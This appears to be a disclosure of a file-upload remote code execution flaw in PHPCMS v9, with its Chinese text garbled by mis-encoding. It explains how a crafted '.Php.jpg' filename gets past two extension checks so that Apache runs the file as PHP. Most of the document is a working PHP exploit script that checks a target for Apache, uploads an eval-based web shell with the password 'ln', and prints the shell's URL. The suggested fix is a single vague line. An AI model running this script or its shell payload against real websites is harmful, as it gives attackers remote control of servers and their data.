PHPCMS v9 Getshell
©¶´ÀàÐÍ£º ÎļþÉÏ´«µ¼ÖÂÈÎÒâ´úÂëÖ´ÐмòÒªÃèÊö£º
phpcms v9 getshell (apache)
Ïêϸ˵Ã÷£º
©¶´Îļþ£ºphpcms\modules\attachment\attachments.php
public function crop_upload() {(isset($GLOBALS["HTTP_RAW_POST_DATA"])) {$pic = $GLOBALS["HTTP_RAW_POST_DATA"];if (isset($_GET['width']) && !empty($_GET['width'])) {$width = intval($_GET['width']);}if (isset($_GET['height']) && !empty($_GET['height'])) {$height = intval($_GET['height']);}if (isset($_GET['file']) && !empty($_GET['file'])) {$_GET['file'] = str_replace(';','',$_GET['file']);//¹ýÂËÁË·ÖºÅif(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();//is_image()¼ì²âÊǸö¹Ø¼üif (strpos($_GET['file'], pc_base::load_config('system', 'upload_url'))!==false) {$file = $_GET['file'];$basenamebasename = basename($file);//»ñÈ¡´øÓкó׺µÄÎļþÃûif (strpos($basename, 'thumb_')!==false) {$file_arr = explode('_', $basename);$basename = array_pop($file_arr);}$new_file = 'thumb_'.$width.'_'.$height.'_'.$basename;} else {pc_base::load_sys_class('attachment','',0);$module = trim($_GET['module']);$catid = intval($_GET['catid']);$siteid = $this->get_siteid();$attachment = new attachment($module, $catid, $siteid);$uploadedfile['filename'] = basename($_GET['file']);$uploadedfile['fileext'] = fileext($_GET['file']);if (in_array($uploadedfile['fileext'], array('jpg', 'gif', 'jpeg', 'png', 'bmp'))) {$uploadedfile['isimage'] = 1;}$file_path = $this->upload_path.date('Y/md/');pc_base::load_sys_func('dir');dir_create($file_path);$new_file = date('Ymdhis').rand(100, 999).'.'.$uploadedfile['fileext'];$uploadedfile['filepath'] = date('Y/md/').$new_file;$aid = $attachment->add($uploadedfile);}$filepath = date('Y/md/');file_put_contents($this->upload_path.$filepath.$new_file, $pic);//ÎļþÃû¿É¿Ø¡¢$pic¿É¿Ø} else {return false;}echo pc_base::load_config('system', 'upload_url').$filepath.$new_file;exit;}}
ºó׺¼ì²â£ºphpcms\modules\attachment\functions\global.func.php
function is_image($file) { ¡¡¡¡ $ext_arr = array('jpg','gif','png','bmp','jpeg','tiff'); ¡¡¡¡ $ext = fileext($file);¹Ø¼üµØ·½ ¡¡¡¡ return in_array($ext,$ext_arr) ? $ext_arr :false; ¡¡¡¡}
¹Ø¼üº¯Êý:
function fileext($filename) {return strtolower(trim(substr(strrchr($filename, '.'), 1, 10))); }
¡¡¡¡Fileextº¯ÊýÊǶÔÎļþºó׺ÃûµÄÌáÈ¡¡£
¸ù¾Ý´Ëº¯ÊýÎÒÃÇÈç¹ûÉÏ´«ÎļþÃûΪddd.Php.jpg%20%20%20%20%20%20%20Php
¾¹ý´Ëº¯ÊýÌáÈ¡µ½µÄºó׺»¹ÊÇjpg£¬Òò´ËÕýÔÚis_image()º¯ÊýÖкó׺¼ì²â±»ÈƹýÁË¡£
ÎÒÃǻص½public function crop_upload() º¯ÊýÖÐ
if(is_image($_GET['file'])== false || strpos($_GET['file'],'.php')!==false) exit();
ÔÚ¾¹ýÁËis_imageµÄÅжÏÖ®ºóÓÖÀ´Á˸ö.phpµÄÅжϣ¬Ôڴ˳ÌÐòԱʹÓõÄÊÇstrposº¯Êý
Õâ¸öº¯ÊýÊǶԴóСдÃô¸ÐµÄº¯ÊýÎÒÃÇʹÓÃ.Php¾Í¿ÉÒÔÖ±½ÓÈƹýÁË¡£
¾¹ýÉϱߵÄÁ½²ãµÄ¹ýÂËÎÒÃǵÄddd.Php.jpg%20%20%20%20%20%20%20Phpºó׺ÒÀÈ»ÓÐЧ¡£
×îºó$basename±äÁ¿µÄÖµ¾ÍΪddd.Php.jpg%20%20%20%20%20%20%20Php È»ºóʹÓÃfile_put_contentsº¯ÊýдÈëµ½ÁËÖ¸¶¨Ä¿Â¼¡£
¿´¼ûddd.Php.jpg%20%20%20%20%20%20%20PhpÕâ¸öºó׺£¬´ó¼ÒÓ¦¸ÃÃ÷°×ÁË£¬ËüÓÃÔÚapache´î½¨µÄ·þÎñÆ÷ÉÏ¿ÉÒÔ±»½âÎö¡£
©¶´Ö¤Ã÷£º
exp:
<?php
error_reporting(E_ERROR);
set_time_limit(0);
$pass="ln";
print_r('
+---------------------------------------------------------------------------+
PHPCms V9 GETSHELL 0DAY
code by L.N.
apache ÊÊÓÃ(ÀûÓõÄapacheµÄ½âÎö©¶´) // ÔÆ°²È« www.yunsec.net
+---------------------------------------------------------------------------+
');
if ($argc < 2) {
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv.' url path
Example:
1.php '.$argv.' lanu.sinaapp.com
2.php '.$argv.' lanu.sinaapp.com /phpcms
+---------------------------------------------------------------------------+
');
exit;
}
$url = $argv;
$path = $argv;
$phpshell = '<?php @eval($_POST[\''.$pass.'\']);?>';
$file = '1.thumb_.Php.JPG%20%20%20%20%20%20%20Php';
if($ret=Create_dir($url,$path))
{
//echo $ret;
$pattern = "|Server:[^,]+?|U";
preg_match_all($pattern, $ret, $matches);
if($matches)
{
if(strpos($matches,'Apache') == false)
{
echo "\nÇ×£¡´ËÍøÕ¾²»ÊÇapacheµÄÍøÕ¾¡£\n";exit;
}
}
$ret = GetShell($url,$phpshell,$path,$file);
$pattern = "|http:\/\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches)
{
echo "\n".'ÃÜÂëΪ: '.$pass."\n";
echo "\r\nurlµØÖ·: ".$matches.'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
else
{
$pattern = "|\/uploadfile\/[^,]+?\.,?|U";
preg_match_all($pattern, $ret, $matches);
if($matches)
{
echo "\n".'ÃÜÂëΪ: '.$pass."\n";
echo "\r\nurlµØÖ·:".'http://'.$url.$path.$matches.'JPG%20%20%20%20%20%20%20Php'."\n";exit;
}
else
{
echo "\r\nûµÃµ½£¡\n";exit;
}
}
}
function GetShell($url,$shell,$path,$js)
{
$content =$shell;
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://".$url.$path."/uploadfile/".$js." HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($url,80);
if (!$ock)
{
echo "\n"."´ËÍøվûÓлØÓ¦,¼ì²âurlÊÇ·ñÊäÈëÕýÈ·"."\n";exit;
}
else
{
fwrite($ock,$data);
$resp = '';
while (!feof($ock))
{
$resp.=fread($ock, 1024);
}
return $resp;
}
}
function Create_dir($url,$path='')
{
$content ='I love you';
$data = "POST ".$path."/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file=http://lanu.sinaapp.com/1.jpg HTTP/1.1\r\n";
$data .= "Host: ".$url."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$data .= "Connection: close\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($url,80);
if (!$ock)
{
echo "\n"."´ËÍøվûÓлØÓ¦,¼ì²âurlÊÇ·ñÊäÈëÕýÈ·"."\n";exit;
}
fwrite($ock,$data);
$resp = '';
while (!feof($ock))
{
$resp.=fread($ock, 1024);
}
return $resp;
}
?>
ÐÞ¸´·½°¸£º
¹ýÂ˹ýÂËÔÙ¹ýÂË
Ò³:
[1]